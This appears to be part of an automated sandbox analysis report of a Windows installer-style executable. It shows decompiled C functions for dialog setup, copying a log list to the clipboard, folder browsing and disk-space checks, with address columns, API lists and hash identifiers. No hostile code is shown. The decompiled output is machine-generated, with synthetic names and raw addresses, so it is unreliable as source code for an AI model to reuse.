                                                                                                                          0x004047a4
                                                                                                                          0x004047b5
                                                                                                                          0x004047c2
                                                                                                                          0x004047c2
                                                                                                                          0x004047c7
                                                                                                                          0x004047cd
                                                                                                                          0x004047cf
                                                                                                                          0x004047d2
                                                                                                                          0x004047d7
                                                                                                                          0x004047dc
                                                                                                                          0x004047de
                                                                                                                          0x004047de
                                                                                                                          0x004047fe
                                                                                                                          0x004047fe
                                                                                                                          0x00404800
                                                                                                                          0x00404801
                                                                                                                          0x00404806
                                                                                                                          0x00404809
                                                                                                                          0x0040480c
                                                                                                                          0x00404810
                                                                                                                          0x00404815
                                                                                                                          0x0040481a
                                                                                                                          0x0040481e
                                                                                                                          0x00404823
                                                                                                                          0x00404828
                                                                                                                          0x0040482a
                                                                                                                          0x0040482c
                                                                                                                          0x00404832
                                                                                                                          0x004048fc
                                                                                                                          0x0040490f
                                                                                                                          0x00000000
                                                                                                                          0x00404838
                                                                                                                          0x0040483b
                                                                                                                          0x0040483e
                                                                                                                          0x00404841
                                                                                                                          0x00404841
                                                                                                                          0x00404847
                                                                                                                          0x0040484d
                                                                                                                          0x00404850
                                                                                                                          0x00404856
                                                                                                                          0x00404857
                                                                                                                          0x0040485c
                                                                                                                          0x00404865
                                                                                                                          0x0040486c
                                                                                                                          0x0040486f
                                                                                                                          0x00404872
                                                                                                                          0x00404875
                                                                                                                          0x004048af
                                                                                                                          0x004048b1
                                                                                                                          0x004048da
                                                                                                                          0x004048b3
                                                                                                                          0x004048c0
                                                                                                                          0x004048c0
                                                                                                                          0x00404877
                                                                                                                          0x0040487a
                                                                                                                          0x00404889
                                                                                                                          0x00404893
                                                                                                                          0x0040489b
                                                                                                                          0x004048a2
                                                                                                                          0x004048aa
                                                                                                                          0x004048aa
                                                                                                                          0x00404875
                                                                                                                          0x004048e0
                                                                                                                          0x004048e1
                                                                                                                          0x004048e7
                                                                                                                          0x004048ed
                                                                                                                          0x004048ed
                                                                                                                          0x004048fa
                                                                                                                          0x00404915
                                                                                                                          0x00404919
                                                                                                                          0x00404936
                                                                                                                          0x0040493b
                                                                                                                          0x0040493e
                                                                                                                          0x0040493e
                                                                                                                          0x00000000
                                                                                                                          0x0040491b
                                                                                                                          0x00404920
                                                                                                                          0x00404929
                                                                                                                          0x00404cb6
                                                                                                                          0x00404cc8
                                                                                                                          0x00404cc8
                                                                                                                          0x00404919
                                                                                                                          0x00000000
                                                                                                                          0x004048fa
                                                                                                                          0x00404832

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 004046E1
                                                                                                                          • GetDlgItem.USER32 ref: 004046EE
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040473A
                                                                                                                          • LoadBitmapA.USER32 ref: 0040474D
                                                                                                                          • SetWindowLongA.USER32 ref: 00404767
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                                                                                                          • DeleteObject.GDI32(?), ref: 004047C7
                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                                                                                                          • GetWindowLongA.USER32 ref: 00404901
                                                                                                                          • SetWindowLongA.USER32 ref: 0040490F
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404920
                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                                                                                                          • GlobalFree.KERNEL32 ref: 00404B0C
                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                                                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                                                                                                          • GetDlgItem.USER32 ref: 00404CAD
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404CB4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N$\jH
                                                                                                                          • API String ID: 1638840714-3926256162
                                                                                                                          • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                                                          • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                                                          • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                                                          • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404EB9, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00404EB9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423664; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E4D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E004059FF(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420478;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42364c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423e88, 8);
							__eflags =  *0x423f0c - _t149; // 0x0
							if(__eflags == 0) {
								E00404D7B( *((intOrPtr*)( *0x41fc48 + 0x34)), _t149);
							}
							E00403D68(1);
							goto L25;
						}
						 *0x41f840 = 2;
						E00403D68(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403DF6(_a8, _a12, _a16);
						}
						ShowWindow( *0x423650, _t149);
						ShowWindow(_t154, 8);
						E00403DC4(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423e90; // 0x4868b0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423650 = GetDlgItem(_a4, 0x403);
				 *0x423648 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423664 = _t127;
				_v8 = _t127;
				E00403DC4( *0x423650);
				 *0x423654 = E0040461D(4);
				 *0x42366c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403D8F(_a4);
				if(( *0x423e98 & 0x00000003) != 0) {
					ShowWindow( *0x423650, _t149);
					if(( *0x423e98 & 0x00000002) != 0) {
						 *0x423650 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403DC4( *0x423648);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423e98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                                                          0x00404ec2
                                                                                                                          0x00404ec8
                                                                                                                          0x00404ed1
                                                                                                                          0x00404ed4
                                                                                                                          0x00405065
                                                                                                                          0x0040506c
                                                                                                                          0x00405090
                                                                                                                          0x00405090
                                                                                                                          0x00405096
                                                                                                                          0x004050a3
                                                                                                                          0x004050c1
                                                                                                                          0x004050c1
                                                                                                                          0x004050c8
                                                                                                                          0x0040511f
                                                                                                                          0x0040511f
                                                                                                                          0x00405123
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405125
                                                                                                                          0x00405128
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405132
                                                                                                                          0x00405138
                                                                                                                          0x0040513a
                                                                                                                          0x0040513d
                                                                                                                          0x00405236
                                                                                                                          0x00000000
                                                                                                                          0x00405236
                                                                                                                          0x0040514c
                                                                                                                          0x00405158
                                                                                                                          0x0040515e
                                                                                                                          0x00405161
                                                                                                                          0x00405164
                                                                                                                          0x00405179
                                                                                                                          0x0040517c
                                                                                                                          0x0040517c
                                                                                                                          0x0040517f
                                                                                                                          0x00405166
                                                                                                                          0x0040516b
                                                                                                                          0x00405171
                                                                                                                          0x00405174
                                                                                                                          0x00405174
                                                                                                                          0x0040518f
                                                                                                                          0x00405197
                                                                                                                          0x00405198
                                                                                                                          0x0040519a
                                                                                                                          0x004051a3
                                                                                                                          0x004051a6
                                                                                                                          0x004051ad
                                                                                                                          0x004051b4
                                                                                                                          0x004051bc
                                                                                                                          0x004051bc
                                                                                                                          0x004051ca
                                                                                                                          0x004051d0
                                                                                                                          0x004051d3
                                                                                                                          0x004051d3
                                                                                                                          0x004051da
                                                                                                                          0x004051e0
                                                                                                                          0x004051e9
                                                                                                                          0x004051f0
                                                                                                                          0x004051f9
                                                                                                                          0x004051fb
                                                                                                                          0x004051fe
                                                                                                                          0x0040520d
                                                                                                                          0x0040520f
                                                                                                                          0x00405215
                                                                                                                          0x00405216
                                                                                                                          0x00405217
                                                                                                                          0x00405217
                                                                                                                          0x0040521f
                                                                                                                          0x0040522a
                                                                                                                          0x00405230
                                                                                                                          0x00405230
                                                                                                                          0x00000000
                                                                                                                          0x0040519a
                                                                                                                          0x004050ca
                                                                                                                          0x004050d0
                                                                                                                          0x00405100
                                                                                                                          0x00405102
                                                                                                                          0x00405108
                                                                                                                          0x00405113
                                                                                                                          0x00405113
                                                                                                                          0x0040511a
                                                                                                                          0x00000000
                                                                                                                          0x0040511a
                                                                                                                          0x004050d4
                                                                                                                          0x004050de
                                                                                                                          0x00000000
                                                                                                                          0x004050a5
                                                                                                                          0x004050a5
                                                                                                                          0x004050ab
                                                                                                                          0x004050e3
                                                                                                                          0x00000000
                                                                                                                          0x004050ec
                                                                                                                          0x004050b4
                                                                                                                          0x004050b9
                                                                                                                          0x004050bc
                                                                                                                          0x00000000
                                                                                                                          0x004050bc
                                                                                                                          0x004050a3
                                                                                                                          0x00404eda
                                                                                                                          0x00404ede
                                                                                                                          0x00404ee7
                                                                                                                          0x00404eee
                                                                                                                          0x00404ef1
                                                                                                                          0x00404ef4
                                                                                                                          0x00404ef7
                                                                                                                          0x00404ef8
                                                                                                                          0x00404ef9
                                                                                                                          0x00404f12
                                                                                                                          0x00404f15
                                                                                                                          0x00404f1f
                                                                                                                          0x00404f2e
                                                                                                                          0x00404f36
                                                                                                                          0x00404f3e
                                                                                                                          0x00404f43
                                                                                                                          0x00404f46
                                                                                                                          0x00404f52
                                                                                                                          0x00404f5b
                                                                                                                          0x00404f64
                                                                                                                          0x00404f87
                                                                                                                          0x00404f8d
                                                                                                                          0x00404f9e
                                                                                                                          0x00404fa3
                                                                                                                          0x00404fb1
                                                                                                                          0x00404fbf
                                                                                                                          0x00404fbf
                                                                                                                          0x00404fc4
                                                                                                                          0x00404fd2
                                                                                                                          0x00404fd2
                                                                                                                          0x00404fd7
                                                                                                                          0x00404fda
                                                                                                                          0x00404fdf
                                                                                                                          0x00404feb
                                                                                                                          0x00404ff4
                                                                                                                          0x00405001
                                                                                                                          0x00405010
                                                                                                                          0x00405003
                                                                                                                          0x00405008
                                                                                                                          0x00405008
                                                                                                                          0x0040501c
                                                                                                                          0x0040501c
                                                                                                                          0x00405030
                                                                                                                          0x00405039
                                                                                                                          0x00405042
                                                                                                                          0x00405052
                                                                                                                          0x0040505e
                                                                                                                          0x0040505e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404F18
                                                                                                                          • GetDlgItem.USER32 ref: 00404F27
                                                                                                                          • GetClientRect.USER32 ref: 00404F64
                                                                                                                          • GetSystemMetrics.USER32 ref: 00404F6C
                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                                                          • GetDlgItem.USER32 ref: 00405029
                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                                                                                                          • GetDlgItem.USER32 ref: 00404F36
                                                                                                                            • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                          • GetDlgItem.USER32 ref: 0040507B
                                                                                                                          • CreateThread.KERNEL32 ref: 00405089
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 004050B9
                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405100
                                                                                                                          • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405132
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405143
                                                                                                                          • AppendMenuA.USER32 ref: 00405158
                                                                                                                          • GetWindowRect.USER32 ref: 0040516B
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051E0
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                                                          • GlobalLock.KERNEL32 ref: 004051F3
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040521F
                                                                                                                          • SetClipboardData.USER32 ref: 0040522A
                                                                                                                          • CloseClipboard.USER32 ref: 00405230
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {
                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                          • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                                                          • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                                                                                                          • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                                                          • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004041CD, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E004041CD(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc48;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E00405282(0x3fb, _t162);
					E00405C3F(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405282(0x3fb, _t162);
							if(E004055B1(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E004059DD(0x41f440, _t162);
							_t145 = 0;
							_t86 = E00405CFF(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E004059DD(0x41f440, _t162);
								_t88 = E00405564(0x41f440);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f440,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f440) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f440,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405517(0x41f440) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f440) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040461D(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42365c; // 0x48b9e6
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404568(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f430);
									} else {
										E00404568(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f24 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403DB1(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420464 == _t145) {
									E00404162();
								}
								 *0x420464 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420478;
							_v56 = E00404502;
							_v52 = _t162;
							_v64 = E004059FF(0x3fb, 0x420478, _t162, 0x41f848, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004054D0(_t162);
								_t124 =  *0x423e90; // 0x4868b0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E004059FF(0x3fb, 0x420478, _t162, 0, _t125);
									if(lstrcmpiA(0x422e20, 0x420478) != 0) {
										lstrcatA(_t162, 0x422e20);
									}
								}
								 *0x420464 =  &(( *0x420464)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040553D(_t162) != 0 && E00405564(_t162) == 0) {
						E004054D0(_t162);
					}
					 *0x423658 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403D8F(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403D8F(_t159);
					E00403DC4(_v12);
					_t138 = E00405CFF(7);
					if(_t138 == 0) {
						L53:
						return E00403DF6(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                                                                                                          0x004041d3
                                                                                                                          0x004041da
                                                                                                                          0x004041e6
                                                                                                                          0x004041f4
                                                                                                                          0x004041fc
                                                                                                                          0x00404200
                                                                                                                          0x00404206
                                                                                                                          0x00404206
                                                                                                                          0x00404212
                                                                                                                          0x00404286
                                                                                                                          0x0040428d
                                                                                                                          0x00404362
                                                                                                                          0x00404369
                                                                                                                          0x00404378
                                                                                                                          0x00404378
                                                                                                                          0x0040437c
                                                                                                                          0x00404382
                                                                                                                          0x0040438f
                                                                                                                          0x00404391
                                                                                                                          0x00404391
                                                                                                                          0x0040439f
                                                                                                                          0x004043a4
                                                                                                                          0x004043a7
                                                                                                                          0x004043ae
                                                                                                                          0x004043b1
                                                                                                                          0x004043e8
                                                                                                                          0x004043ea
                                                                                                                          0x004043f0
                                                                                                                          0x004043f7
                                                                                                                          0x004043f9
                                                                                                                          0x004043f9
                                                                                                                          0x00404415
                                                                                                                          0x00404451
                                                                                                                          0x00000000
                                                                                                                          0x00404417
                                                                                                                          0x0040441a
                                                                                                                          0x0040442e
                                                                                                                          0x00404430
                                                                                                                          0x00000000
                                                                                                                          0x00404430
                                                                                                                          0x004043b3
                                                                                                                          0x004043b7
                                                                                                                          0x004043e6
                                                                                                                          0x004043e6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004043b9
                                                                                                                          0x004043b9
                                                                                                                          0x004043c6
                                                                                                                          0x004043cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004043cf
                                                                                                                          0x004043d1
                                                                                                                          0x004043d1
                                                                                                                          0x004043dc
                                                                                                                          0x004043df
                                                                                                                          0x004043e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004043e4
                                                                                                                          0x0040443f
                                                                                                                          0x00404446
                                                                                                                          0x0040444d
                                                                                                                          0x00404454
                                                                                                                          0x00404454
                                                                                                                          0x00404459
                                                                                                                          0x0040445b
                                                                                                                          0x00404463
                                                                                                                          0x00404469
                                                                                                                          0x00404469
                                                                                                                          0x00404470
                                                                                                                          0x00404479
                                                                                                                          0x00404483
                                                                                                                          0x0040448b
                                                                                                                          0x004044a1
                                                                                                                          0x0040448d
                                                                                                                          0x00404491
                                                                                                                          0x00404491
                                                                                                                          0x0040448b
                                                                                                                          0x004044a6
                                                                                                                          0x004044ab
                                                                                                                          0x004044b0
                                                                                                                          0x004044b9
                                                                                                                          0x004044b9
                                                                                                                          0x004044c2
                                                                                                                          0x004044c4
                                                                                                                          0x004044c4
                                                                                                                          0x004044d0
                                                                                                                          0x004044d8
                                                                                                                          0x004044e2
                                                                                                                          0x004044e2
                                                                                                                          0x004044e7
                                                                                                                          0x00000000
                                                                                                                          0x004044e7
                                                                                                                          0x004043b1
                                                                                                                          0x0040436b
                                                                                                                          0x00404372
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404372
                                                                                                                          0x00404293
                                                                                                                          0x00404299
                                                                                                                          0x004042b3
                                                                                                                          0x004042b8
                                                                                                                          0x004042c2
                                                                                                                          0x004042c9
                                                                                                                          0x004042d8
                                                                                                                          0x004042db
